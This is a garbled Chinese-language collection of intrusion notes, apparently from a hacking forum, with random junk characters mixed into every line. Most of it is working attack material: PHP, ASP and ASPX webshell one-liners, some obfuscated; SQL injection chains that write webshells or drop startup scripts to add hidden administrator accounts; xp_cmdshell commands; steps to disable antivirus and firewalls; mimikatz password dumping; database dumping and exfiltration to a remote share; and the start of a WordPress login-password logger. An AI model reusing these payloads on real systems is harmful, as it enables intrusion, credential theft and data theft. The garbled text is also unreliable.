   而终端所对应的服务名为:TermService 3 J: [" _8 _/ {3 |! q: G3 O6 A
第二步:用netstat -ano命令,列出所有端口对应的PID值! % n$ Q9 O; y, p  r$ o4 W: u
   找到PID值所对应的端口0 j5 Y/ i/ |- |' ^: E

/ K* ?: C* K9 |查询sql server 2005中的密码hash" S$ X% P1 @  T) }
SELECT password_hash FROM sys.sql_logins where name='sa'. v% ~1 X9 b' x4 [# C6 s) u& G
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
# }2 A: K! a6 [$ r; ~access中导出shell
2 d( D  \9 {7 v, B8 d, Z0 D5 K' h4 A5 t% v7 z1 I; q: _* D
中文版本操作系统中针对mysql添加用户完整代码:
. k& v- _0 N8 {6 p' [7 N( m) O, t1 y4 x; r
use test;# v+ ^0 }- d8 W4 n6 P) c$ K4 [
create table a (cmd text);  t/ r1 Q, P: ?7 x, C, W4 m2 ~
insert into a values ("set wshshell=createobject (""wscript.shell"") " );' X. p) V% l, \' g5 M1 N; G+ Y- `) d
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
4 |+ h' `9 P$ q9 V( Y# [insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );+ K! @0 ~3 {  U
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
) L! F7 A+ d/ |/ ]drop table a;" q- D: A. r" C! S- c' t+ B, {1 h9 u, M/ `
3 J6 v( C$ }' C3 k( X4 y
英文版本:1 _- A$ r  a/ z4 {" w! P
. ~2 [0 A1 l+ d" F
use test;* @5 y* ]6 O  |2 v
create table a (cmd text);0 K4 V) I8 Q6 i
insert into a values ("set wshshell=createobject (""wscript.shell"") " );1 d+ Y8 C/ ^  }' i
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );$ A' {+ z; n" Q$ W% K  Z3 Z
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );2 s/ m, `2 F8 V: H' }0 ^/ w* w
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";3 Z/ Z. D3 R- F- {$ O; f
drop table a;: Z: q  |$ y" t0 _7 G& S

, r: B( e/ Y1 k1 ?8 d7 M& |- M6 ucreate table a (cmd BLOB);
9 |; Z9 ~4 x' P, r6 u+ ainsert into a values (CONVERT(木马的16进制代码,CHAR));: z4 ~5 y$ r" b& B5 A% S
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'' ?) ?! y% D( j& h! ~2 J( c. Y$ f
drop table a;7 m$ m5 G0 p* j9 u2 E7 l) B8 L
) n4 F6 C/ J. a* S& L0 }$ M
记录一下怎么处理变态诺顿
- z- F1 f( x9 j0 i6 Y% k查看诺顿服务的路径/ f& N0 k/ D/ \! d& z
sc qc ccSetMgr
1 W4 d+ c9 G, c9 v: H; G; K! a# F然后设置权限拒绝访问。做绝一点。。" E) L2 D) V  ?6 ]! \! q5 v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
  G: q4 o$ Q5 z; e; ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
+ |, e' M2 l# G! dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators; V7 w6 ?% @0 ~- }
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone/ a! G  {! N" i- d6 E# {2 O! v

, Z! Z; d; `- h9 x" e2 Z5 c' z然后再重启服务器- ]+ x" u& U6 p/ r/ J+ ^. t( B
iisreset /reboot
0 I# W4 g  d8 n1 @4 R8 P+ b这样就搞定了。。不过完事后。记得恢复权限。。。。
2 |+ [. o/ t6 ~3 q8 T  ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
. M6 y: ]! P! B% g3 Z6 qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F9 v( ~8 \% N: R8 L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F, U/ M/ z: e6 m5 D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
7 O- N. }3 H* R9 \SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin$ o' _! ~' j0 b" }8 x6 E, h9 b

3 Y- F- C* O/ V4 B) vEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''), u. n9 T- z: k+ {
- w0 F2 W& y' H7 i' l6 h& j
postgresql注射的一些东西
6 X/ E6 H+ C2 {. ?) R/ C如何获得webshell
% x! l1 D, L" `( Chttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
% u; h' L! R1 g; ]0 b4 K" L7 ?http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); , R9 W, q0 I0 u( a
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
* n% \+ K: G! h6 F8 o( t  |7 h如何读文件$ m' S7 Q. V* j9 l$ D
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);6 l/ e' p: ~' A, q
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
  O' I: X" Z) Z# ]http://127.0.0.1/postgresql.php?id=1;select * from myfile;
! \4 x0 C. B- S' @$ P  K# c9 ]6 d( |
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。4 w5 x9 x2 Y+ r
当然,这些的postgresql的数据库版本必须大于8.X
# v. I2 g( e: d8 a7 {创建一个system的函数:
' D" s2 Z" L$ W3 i( lCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; [- z' ]4 k4 G

, l: U7 m8 l- ?! }创建一个输出表:  W4 H* G: y! p. h/ D
CREATE TABLE stdout(id serial, system_out text)% E5 n) n5 m! q
$ D& f" f7 A& ]. t
执行shell,输出到输出表内:
' X! q7 m. P6 _SELECT system('uname -a > /tmp/test'), J3 [! \! d' T5 l( s1 b. C  c

* j; i) B; J  N' Y  G' m+ Vcopy 输出的内容到表里面;
) R% f. h! X6 m6 J$ c! A: E: hCOPY stdout(system_out) FROM '/tmp/test'/ ?& h6 o6 m1 d1 p6 ]

% i/ {0 w$ k, z从输出表内读取执行后的回显,判断是否执行成功9 R# s8 v* u0 d, g/ D2 O

' `) w$ L3 o9 J7 E6 W7 ^/ \SELECT system_out FROM stdout$ @# X# A2 `) ^7 _% v
下面是测试例子
" R) y, ?3 \4 A1 ]2 j! c- @( m) ]7 S) i0 j$ v+ z$ H
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ( E' K# V" B: h. I3 \  [

2 C& c4 r* }5 y4 B' e/ Z/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
  `1 Z, L; t# h5 k% n6 T8 OSTRICT --
" o1 ?9 ~+ `+ L3 T- G6 M# H5 e% p/ W
/store.php?id=1; SELECT system('uname -a > /tmp/test') --6 G" U0 \+ w1 I9 p
# d. b, J! g. H, K( H( i  v
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
. I4 K+ j& ]) ~) m  e9 j; I7 G4 ?, }
! V& Y; V# t, z/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
6 q3 \2 @( L$ S, ^$ V% `! Nnet stop sharedaccess    stop the default firewall* d4 X- [7 |) \* T/ O1 |
netsh firewall show      show/config default firewall" F$ o. l6 V8 M! u$ n. N. Z* \
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
& [, i$ y+ E1 ~! Knetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall2 a0 l; p- ]; O
修改3389端口方法(修改后不易被扫出)
; p( F) [0 n* C9 w修改服务器端的端口设置,注册表有2个地方需要修改6 z$ d8 }5 A( @9 B, E- D

. Y* K8 C1 c' p5 m6 z' U" W0 |[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]$ Y1 ?# n! e3 L+ L3 O
PortNumber值,默认是3389,修改成所希望的端口,比如6000
9 L- k  `5 i. y" g
2 B& Z+ i( s, y' I- i第二个地方:
+ z3 I) q" z4 l1 a% k[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
* }' |8 Y5 X8 @9 w' f: Q# ?% c  tPortNumber值,默认是3389,修改成所希望的端口,比如6000: a! X) x: @- m3 g0 [. s6 t- j; {

3 C# O0 V) n' E: W* T2 E# _4 \现在这样就可以了。重启系统就可以了
4 \  a7 o3 U* Z! J2 ~0 @
. g2 R" _9 u; g9 v2 ~查看3389远程登录的脚本
3 `7 J, g2 Y: T: v保存为一个bat文件  g8 u$ H8 ^2 v* _. S2 b
date /t >>D:\sec\TSlog\ts.log
( o, f" D/ e$ Wtime /t >>D:\sec\TSlog\ts.log3 B: E8 p+ \+ v0 ~0 c
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
/ R! _# ], M5 s6 y# `' rstart Explorer
! O) B* {/ Q5 _2 E: y: S7 t$ [% T' k# X
mstsc的参数:
( M+ o! V" }8 q  k( b* M' J! f
# {" y6 s  g2 i远程桌面连接2 b9 O. C9 `6 E- b0 F! v
/ X0 b4 I+ X2 m
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
) e8 l+ m$ p( d2 P  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?! E- Y- `, p% y0 }3 x# M8 o5 c

2 Y9 |- U+ _% n# E2 Z  e4 Y<Connection File> -- 指定连接的 .rdp 文件的名称。8 l( L/ w& U0 r9 |; y% B) ?

" U  V' Q( a9 M4 `/v:<server[:port]> -- 指定要连接到的终端服务器。) u- W9 _9 a- F5 \2 u, u

" X; T9 h" Y3 {: e* ]# _2 m0 a/console -- 连接到服务器的控制台会话。- x" l; W; E3 t, I' n' x

" T/ L$ T( C+ m+ O4 V: R. N/f -- 以全屏模式启动客户端。
2 y& Q3 V2 C  |: J4 s4 O3 w
( @" ]4 L0 x; [  d" {* k/w:<width> --  指定远程桌面屏幕的宽度。
5 O1 l9 G7 y% ~6 v+ ~
- f3 e' |9 \0 z  k/h:<height> -- 指定远程桌面屏幕的高度。
9 A5 D7 K! [6 f7 l% Y
+ w, ]0 i/ d2 V7 p* d9 _/edit -- 打开指定的 .rdp 文件来编辑。
; w" ^/ P/ b9 W7 [2 y
+ G& }2 J4 u/ i* @/migrate -- 将客户端连接管理器创建的旧版. ^% l5 u* _# c. c
连接文件迁移到新的 .rdp 连接文件。
$ y6 l/ e4 @2 ]
+ `$ M6 [) N9 t8 h2 q2 ~
. [) x- R( d1 _, m其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就! T  ]. ]9 ?" n* e/ g( p
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量3 }& f4 H2 |/ P

* b3 H/ z, S" e命令行下开启3389
  i" o/ ^9 P3 Enet user asp.net aspnet /add
* m+ h$ s" M/ R% j( jnet localgroup Administrators asp.net /add
# j0 Y; E6 v2 Knet localgroup "Remote Desktop Users" asp.net /add. h) @6 N/ K) X' B3 M1 _
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
) t: @% O2 n6 U7 u! S) k& P  wecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 05 a8 K. X0 w2 o  p
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
  \; ~) t8 ]  g" kecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
" X# E* U9 Q3 Z; Z- e- Gsc config rasman start= auto7 W) f3 J5 D/ I0 G" ^! }2 t. k
sc config remoteaccess start= auto+ D6 B! i% _) q* b( L
net start rasman( u: G/ V6 H' [% U# B
net start remoteaccess
  M! d/ o% v: O9 IMedia  W% P$ b+ b1 H& N* [" Z+ j  _
<form id="frmUpload" enctype="multipart/form-data"
4 Y- s: w* \( S" y; B7 daction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>6 C  m+ n5 C+ H2 M# A
<input type="file" name="NewFile" size="50"><br>
( x( V6 W3 [1 u, Y, M" O1 R+ w<input id="btnUpload" type="submit" value="Upload">5 D- M- P6 T1 Z! \1 K, {. c
</form>
% r7 v- _6 `0 ^5 \7 @3 J3 r$ @/ L! O% N  C
control userpasswords2 查看用户的密码) B  a' h# B7 B( D- a% f
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径: U- ^2 k: A& O5 d9 L( w
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
6 ~0 q1 h* ]0 q8 v- i
0 y$ E. U% Q1 p8 k; _141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
4 `# m0 n  K( b4 [测试1:
2 q, Z3 ^. ]9 HSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. R! x) y) b7 K% K. V4 d- w+ o
0 H0 b( H6 F' a) s( [, a1 c' p9 P' J
测试2:* Q% e' j+ y* ~) B: D/ n* ?" |7 m
" L6 [" I6 O" t1 ?! |, K. L+ [; n
create table dirs(paths varchar(100),paths1 varchar(100), id int)$ R- L3 R& W. S4 d

8 d, x" y4 |0 _9 p4 s$ zdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
0 q2 i  O; b0 \* _  N, L2 p  Q' `' r  B. w, V" W
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
. Z; |) _7 Q) k2 u9 H; w关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
& J4 V) ]8 A: J" L0 X可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;4 |1 u+ C; ^' O& g
net stop mcafeeframework% r) P8 b( {: ~( |
net stop mcshield
- ^" v' H2 k8 y+ o4 Knet stop mcafeeengineservice
4 Q, v$ @# Y3 e( F+ cnet stop mctaskmanager) g, {1 N1 G. w( O  S- d7 x1 `3 q
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D  T2 {5 |# \. |8 d) i, k

; T  Q: N$ S  P# u2 m2 L  VNCDump.zip (4.76 KB, 下载次数: 1)
0 q3 @; c6 H% W3 u9 |" [6 f密码在线破解http://tools88.com/safe/vnc.php# F4 m  @. P+ Z4 B
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
: @4 @9 G6 j% T$ M
( }" B7 X4 `6 v2 h! Xexec master..xp_cmdshell 'net user'
8 m$ M, |8 d; `& W4 W. c4 R) I9 ^mssql执行命令。
' ]# g3 u0 p; Y) g+ h- A4 Z/ z% ]) i获取mssql的密码hash查询
& p/ b& x0 i  L% d  h' D' e  cselect name,password from master.dbo.sysxlogins6 u& t; ?5 i& A  a* E+ {9 Q
1 T8 @" J8 o) V/ P/ @  U
backup log dbName with NO_LOG;- Y: ?, e& ?4 \3 D2 V$ Z
backup log dbName with TRUNCATE_ONLY;
8 K; |/ a* C7 B% @2 k+ wDBCC SHRINKDATABASE(dbName);
6 w- x1 P4 {4 M( ?8 Y  dmssql数据库压缩) W- g: t! `. a9 l  t/ P
3 V, q) k, _# y& y" L0 K# U) p, s
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK7 M$ S1 ~) H7 r$ B. O
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
- G) ^1 G3 E6 Z
' L0 R& v0 a3 ]! h  F$ J* Abackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'4 Y$ B2 b4 I) j0 o
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak! C  ?; d9 A1 ~- h2 L4 V" z

3 j7 C, i. D" S/ [4 [Discuz!nt35渗透要点:6 ?5 k/ ]# I- z$ J' k
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 W1 R, b* Q8 |6 R(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>( w9 x" l  Q! {8 K* Q. z! C) ?
(3)保存。
! u- c5 S1 k  B) a. l. |(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
; E1 s4 @0 m' u& n. J; qd:\rar.exe a -r d:\1.rar d:\website\
; w& F, l  I3 W) Z递归压缩website. b: `; r6 T7 I6 l/ \+ K
注意rar.exe的路径
' w& P; Z! u" |/ M! }0 C0 _5 d# Y' J7 i6 X8 S+ Z& T
<?php
% G! U2 l5 g* v" _3 q) ~  C) f7 I* {& r' @6 Z, g5 ~* e0 `! P
$telok   = "0${@eval($_POST[xxoo])}";3 i$ p! U6 @6 j" V3 B3 \( C. O7 W
& j- s0 }+ h' N2 d* }0 o
$username   = "123456";' x5 B* Z2 Y+ @, y) T9 w

6 r) }, E2 @+ y8 j4 }; Z$userpwd   = "123456";
; M* E  \- B* T" Y! T2 @2 x2 b+ Z. K  [
$telhao   = "123456";
$ G8 q- j6 D* j8 B% v; x& A
. {' W9 @( x+ b9 Z1 s: X4 e$telinfo   = "123456";/ o- ]: `# ?) c! z
- G( T8 P& x3 u( R/ J5 ^
?>
3 o3 Y% N6 S; g* Gphp一句话未过滤插入一句话木马+ b, I0 _, s: P* O
/ Y, E: V, b4 T4 N2 M+ e  @9 ?
站库分离脱裤技巧, U0 E- {3 m  E, `
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'5 B) _, j8 _; `, m3 V" M- t
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'$ [# ~' j3 r, t! O+ ^/ d5 B) N1 M
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。& K& l( b% k9 h7 y% \; n
这儿利用的是马儿的专家模式(自己写代码)。  h! E: ~) d: x
ini_set('display_errors', 1);
& `7 Q! p1 o# Q& G1 h+ F+ a9 X# [3 C! nset_time_limit(0);0 l% d$ _3 Z7 Y# S; E, W& p
error_reporting(E_ALL);
+ ~! n9 W$ l: [) |7 k' {. v$ v  r$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
5 S0 @4 S4 F$ x3 ?8 d) kmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
& {3 G7 ]" H& @9 D2 h* N$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
) g. l' e( v7 y& W; V$i = 0;
7 j) T. i& v; m/ s3 r$tmp = '';' V% V4 A+ ^* R+ b
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {$ c9 O  r! h3 u7 p
    $i = $i+1;
# n  n; h$ f" [    $tmp .=  implode("::", $row)."\n";. p" l8 ^2 K! a/ @
    if(!($i%500)){//500条写入一个文件6 J. v- f% F, R& k# `$ l! Y: k+ G
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';0 ?, e& T; Z( p4 G, }; N0 R
        file_put_contents($filename,$tmp);
2 J0 q: K  ?9 o2 Q/ D        $tmp = '';
1 W  M) ]+ u- o8 w$ C4 j% ]  G9 V! `  i    }7 K: o! F5 Q! m# B7 I
}; m9 T, O/ k- y5 w3 J2 m" V& o
mysql_free_result($result);! u* ~- m7 v0 o, a1 K

4 {5 w8 n: U5 m) z& S# \
2 V/ [: E; y+ s' B, I0 o/ \8 v9 w7 c8 V! T1 v4 f, P( _' x7 ~
//down完后delete
, c5 h' q! B& z7 Y1 c( n2 |8 i! T5 Q/ H: s: g3 M8 A

! E& l) I5 n* g/ l; _4 X  I2 ?$ xini_set('display_errors', 1);' `: H6 `% O; _0 U9 ]
error_reporting(E_ALL);
2 |7 {* X! W2 e0 ]; j% Y$i = 0;% w( {% T% C1 J# n
while($i<32) {8 g; [8 t. g- _7 b% X0 p
    $i = $i+1;/ N' }& T' V1 g- q3 h" S1 o
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
( v3 X" O3 C# @! t3 e5 U2 n. W        unlink($filename);
# u# k2 y" ~+ D% X4 X  R8 B}
2 K$ d9 V7 y' V$ Qhttprint 收集操作系统指纹6 B( ^% Z$ S: n9 B
扫描192.168.1.100的所有端口
& s$ U' [8 e; Knmap –PN –sT –sV –p0-65535 192.168.1.100
4 j, T/ t, E, ehost -t ns www.owasp.org 识别的名称服务器,获取dns信息. w  Z3 y3 b* x$ Q: N
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
6 F! y5 I% v; f  H& C# }. HNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host2 S" }, ?2 ^: w- p
$ r; Y0 B- Z8 k5 R5 p5 v
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
' L8 \# Q$ b7 E( i6 a& n
) R. h. g  z9 j! G  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
! ]+ H( `+ }( Y) f* X! {7 A% @
3 w+ |( ?. V- g. y% u* w  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
# V$ K7 `- Y+ g) C  K  B4 ?. ~& @. ]
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
8 h" Z# U7 M( V7 b7 F- q8 M* K. @8 @
  http://net-square.com/msnpawn/index.shtml (要求安装)
- n8 U9 |8 v" R3 q9 K/ [6 P% }, D
# S4 m% N2 o! r2 ^  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
" v- r) c! X  T+ G
, v1 J9 n% X+ c5 |( j  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
0 p* F4 Y- Z2 w/ x* m- y$ H9 Q8 yset names gb2312# T+ A, U1 G6 g$ n% w" o# X
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
$ i6 J9 v; S: b1 U/ \
1 w  z1 J# I, t/ ?mysql 密码修改: t. Y& C2 y& R. D  z+ m1 T3 ^5 \, E
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” ' b6 q! M1 A2 E. z; s; s- t
update user set password=PASSWORD('antian365.com') where user='root';) _, Q% N9 P' l' ~: D. q
flush privileges;
1 _; v. q7 W/ E# R& R2 @高级的PHP一句话木马后门# A, H2 j9 A+ S/ y
: Y/ C; x+ \  \3 A5 X- f+ U' |, W" o7 Y
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
7 @* w6 q, I; [# n6 {
/ P# J2 I6 w: ?: ]8 Y8 J7 m6 g1、. I- E4 V$ k$ S- x7 C
7 O6 d( {9 `) o8 q( w3 m$ f6 |& X7 b
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; [5 v, W( I4 @/ W( {4 M) |8 g4 H3 h) @7 E, ^9 C! b; _
$hh("/[discuz]/e",$_POST['h'],"Access");
7 o" p4 v7 H- O* O: H
- r( h$ N% q* l% P; A//菜刀一句话
% ?" o0 y1 S8 \2 f+ q* i4 \* y9 y! S1 v0 X4 m
2、
! q8 N! S; ]" L
) L4 Z1 ?- |" b! _+ Q$filename=$_GET['xbid'];
% J( H7 ^; K% V( ]- L9 c4 `( R$ K8 r1 _+ U' r' P) {
include ($filename);6 a5 |4 x" u& Q* s. z

9 s% v* m, ~* x3 Y//危险的include函数,直接编译任何文件为php格式运行" D/ s7 L4 l: A) V+ c! k

0 ~+ Q# l1 F4 q* K* y5 z  S% J2 B3、
/ p1 V( ?- L, Q& i" K3 `6 x9 m3 b- h+ \6 Z' N2 `
$reg="c"."o"."p"."y";% V7 I! ^) ?9 e: s3 [8 e4 ]( k2 X% U

* R8 i8 m  E' w, @0 p2 e4 ?  N- P$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);0 M8 R: L) G- G9 J. c3 h' d
' e0 c  ~# X! y
//重命名任何文件
/ s% N5 }: [2 C8 }/ R* a9 K6 }  G
2 ]" i1 u! U- [4、; H+ n" X! c6 C. u; o' e8 I' A7 u1 \
6 K/ ]2 Q) N& o1 D- H3 q
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
, W% K9 p9 M1 E, U3 x( @& q; w8 E$ A! t5 B7 H7 M& ~
$gzid("/[discuz]/e",$_POST['h'],"Access");, q* [% E" j0 e/ ?, D

. X) [6 N% G4 i. {+ F9 U, a//菜刀一句话
3 n# t* O9 G' \4 I3 H, q( N% O& {1 e
6 h4 |$ K* K/ d% o1 G5、include ($uid);
( p, l; G; h3 W' C0 \6 T* m% M7 A6 C, ]9 z6 t! L; v
//危险的include函数,直接编译任何文件为php格式运行,POST 3 ]5 X4 V. n+ p  |: {! Q* U( }9 w3 \
# A+ D5 a, ^2 t: @
( f# j5 x/ }  D, L1 P
//gif插一句话
+ ~: n. ]) p  {! J1 d5 t9 Z, X' y: n- F, u
6、典型一句话; y5 T7 C) v2 D7 x- G; @0 R

! e6 b0 T- w8 D, U& t/ {. ~程序后门代码
8 ]8 F6 A" I* u! l* _) `0 B/ g& N<?php eval_r($_POST[sb])?>3 J2 K. g! X: D3 {
程序代码* f, I* Z9 I4 K) z; w3 x) l5 G
<?php @eval_r($_POST[sb])?>
4 s6 a+ `- ^1 E3 ~0 X% Q# X9 n, g2 b//容错代码
/ j, n2 P! Y5 P; Y% w/ Z5 e程序代码
. M& p# B. q$ [, Y<?php assert($_POST[sb]);?>
& E" y1 [3 K, ]) U! L7 b$ ~- Y//使用lanker一句话客户端的专家模式执行相关的php语句; }: c, i; ]7 E! [$ ]
程序代码% J2 D; J! B$ C+ V2 Z
<?$_POST['sa']($_POST['sb']);?>
" L8 j2 p. k! `# {6 |7 J程序代码9 H: C" [+ {- y  l( ?: E
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
+ ]' q7 r- _0 I1 r9 S6 R8 z程序代码
; P- W. R& H+ H- @  _<?php* Y0 a# M4 M& U7 S
@preg_replace("/[email]/e",$_POST['h'],"error");3 Q4 H* Q% G$ o: M
?>
5 `* C9 V* q+ L3 W//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入0 @( t" T. W# H
程序代码7 x" \& a9 Z! C6 x6 |
<O>h=@eval_r($_POST[c]);</O>; z2 Z2 V  k3 h0 c0 M' a, J6 N
程序代码
. d4 D/ |& u8 N* h) }& k+ V<script language="php">@eval_r($_POST[sb])</script>
  ^' h, o. T2 b" I//绕过<?限制的一句话
" H! W% J9 Y) j( I2 I
% f) H! m" s( C; a$ E/ p+ shttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip5 N5 V, Y1 @& b" D) C
详细用法:2 j3 r0 T7 E( b* l( p" C
1、到tools目录。psexec \\127.0.0.1 cmd
+ u% R) W- I  `2 |* f2 I9 |" U2、执行mimikatz4 M2 ?/ |' C' H& }7 F
3、执行 privilege::debug: V: ?- m) |4 J5 u( S
4、执行 inject::process lsass.exe sekurlsa.dll! U+ ?6 ^& [0 N9 F+ S% x
5、执行@getLogonPasswords, {( P+ K9 E" d' @3 `, o  ]
6、widget就是密码/ J! P# d( a1 J2 ~' O% I
7、exit退出,不要直接关闭否则系统会崩溃。' e, ]5 P" L0 e9 A
" K3 O( X6 t' `$ m, q
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
2 a9 c! a. S7 M5 @( U) W# _
- L$ Y) v$ O9 U) t7 e% L5 E3 Q自动查找系统高危补丁
# U3 c* a. p# _$ Bsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt' ]% i$ h8 o9 Z4 U

! r/ F# O7 d3 N  J突破安全狗的一句话aspx后门
$ I8 J: y* p, T$ V; d2 ]<%@ Page Language="C#" ValidateRequest="false" %>
) q) i4 ~- z. V8 j8 O( E( i<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
2 ?9 c& O! [7 D2 nwebshell下记录WordPress登陆密码7 Z9 p* G( x4 }9 X( |
webshell下记录Wordpress登陆密码方便进一步社工5 \; V8 X4 d" ]7 P- y$ K% ?0 A
在文件wp-login.php中539行处添加:
8 ~* Z, J5 D9 p- K' P6 E! i( h# W// log password
